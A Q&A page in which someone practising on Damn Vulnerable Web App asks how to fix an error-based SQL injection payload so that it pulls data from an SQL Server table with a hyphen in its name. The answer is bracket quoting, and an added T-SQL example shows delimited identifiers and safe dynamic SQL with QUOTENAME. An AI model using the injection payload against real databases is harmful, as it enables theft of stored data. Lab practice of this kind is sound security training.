Question

I am working with Damn Vulnerable Web App against a Microsoft SQL Server. My question is actually quite straightforward, but can be misinterpreted quite easily. Basically, this is my query:

+AND+1=convert(int,
    (select+
        top+1+
        user+
    from+
        TBL-Users
    )
)--

Now my question is simple. This is the query to extract data from the columns. How do I craft it so that it allows me to extract data from this column? Because apparently, it does not like that I am using the '-' character in this query (but that's the table name).

According to this error:

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '-'.

How can I work around this, and get the data from the column assuming that the '-' character is in the table name?


Solution

In SQL Server you can basically use most of the reserved words and special characters inside []:

select *  from [TBL-Users]
Licensed under: CC-BY-SA with attribution
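
An added example (not part of the original answer), in T-SQL: the delimited-identifier rule the answer describes, and the same rule applied defensively when application code builds SQL around a table name held in a variable. The column layout, sample rows and variable names are constructed for illustration; only the table name TBL-Users comes from the page.

```sql
-- Double-quoted identifiers are only accepted while this setting is ON.
SET QUOTED_IDENTIFIER ON;

-- Constructed schema: a table whose name contains '-' must be delimited
-- everywhere it is referenced, including at creation time.
CREATE TABLE [TBL-Users] (
    id     INT IDENTITY(1,1) PRIMARY KEY,
    [user] NVARCHAR(64) NOT NULL  -- USER is a reserved keyword, so delimit it as well
);
INSERT INTO [TBL-Users] ([user]) VALUES (N'alice'), (N'bob');  -- constructed rows

-- Without delimiters the parser stops at the hyphen, which is not a legal
-- character in a regular identifier:
--   SELECT [user] FROM TBL-Users;

-- Bracket-delimited form (T-SQL specific).
SELECT TOP (1) [user] FROM [TBL-Users] ORDER BY id;

-- ANSI double-quoted form, equivalent under QUOTED_IDENTIFIER ON.
SELECT TOP (1) "user" FROM "TBL-Users" ORDER BY id;

-- Dynamic SQL: when the table name arrives in a variable, never splice it in
-- raw and never hand-write the brackets. QUOTENAME adds the delimiters and
-- doubles any ']' inside the name, so the value cannot close the identifier
-- and continue as SQL. Data values still travel as parameters.
DECLARE @table sysname      = N'TBL-Users';  -- hypothetical caller-supplied name
DECLARE @name  NVARCHAR(64) = N'alice';      -- hypothetical caller-supplied value
DECLARE @sql   NVARCHAR(MAX);

-- Only run the statement if the name resolves to an existing user table.
IF OBJECT_ID(QUOTENAME(@table), N'U') IS NOT NULL
BEGIN
    SET @sql = N'SELECT id, [user] FROM ' + QUOTENAME(@table)
             + N' WHERE [user] = @name;';
    EXEC sys.sp_executesql @sql, N'@name NVARCHAR(64)', @name = @name;
END;

-- Compare how QUOTENAME treats an ordinary name and one containing ']'.
SELECT QUOTENAME(N'TBL-Users') AS plain_name,
       QUOTENAME(N'odd]name')  AS name_with_bracket;
```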